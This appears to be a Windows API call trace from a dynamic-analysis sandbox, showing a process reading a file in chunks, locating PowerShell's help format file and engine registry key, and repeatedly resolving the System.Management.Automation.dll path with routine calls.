	[0660.063] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.063] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.064] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.064] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.064] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.065] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.065] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.065] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.066] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.071] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.071] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.071] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.072] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.072] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.072] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.073] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.073] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.073] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.074] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.074] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.074] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.075] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.075] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.076] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.076] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.076] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.077] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.077] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.077] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.078] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.078] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.078] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.079] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.079] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.079] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.080] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.080] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.080] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.080] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0660.081] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0xf37, lpOverlapped=0x0) returned 1
	[0660.081] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75117, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75117*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0660.081] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f75a78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2f75a78*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0660.081] CloseHandle (hObject=0x2fc) returned 1
	[0660.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0660.082] SetErrorMode (uMode=0x1) returned 0x1
	[0660.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d2e0 | out: lpFileInformation=0x16d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0660.082] SetErrorMode (uMode=0x1) returned 0x1
	[0660.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0660.082] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x2fc) returned 0x0
	[0660.082] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0660.082] CoTaskMemAlloc (cb=0x5a) returned 0x2f7cd0
	[0660.082] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2f7cd0, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0660.082] CoTaskMemFree (pv=0x2f7cd0) 
	[0660.083] RegCloseKey (hKey=0x2fc) returned 0x0
	[0660.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0660.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0661.462] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x3f49bdc8, Data2=0xd48d, Data3=0x4e69, Data4=([0]=0xa4, [1]=0xb5, [2]=0xa7, [3]=0x56, [4]=0x39, [5]=0xa5, [6]=0x87, [7]=0x9c))) returned 0x0
	[0661.462] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xc656008f, Data2=0x4c9f, Data3=0x46aa, Data4=([0]=0x9b, [1]=0x54, [2]=0xb0, [3]=0x77, [4]=0x6a, [5]=0x91, [6]=0x39, [7]=0xfd))) returned 0x0
	[0661.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.477] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x7d9c385e, Data2=0x4620, Data3=0x4268, Data4=([0]=0x88, [1]=0x43, [2]=0xe5, [3]=0xb2, [4]=0x7f, [5]=0xe6, [6]=0xea, [7]=0xbd))) returned 0x0
	[0661.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.481] VirtualQuery (in: lpAddress=0x16b600, lpBuffer=0x16c4c0, dwLength=0x30 | out: lpBuffer=0x16c4c0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.482] VirtualQuery (in: lpAddress=0x16b690, lpBuffer=0x16c550, dwLength=0x30 | out: lpBuffer=0x16c550*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0661.484] VirtualQuery (in: lpAddress=0x16be10, lpBuffer=0x16ccd0, dwLength=0x30 | out: lpBuffer=0x16ccd0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
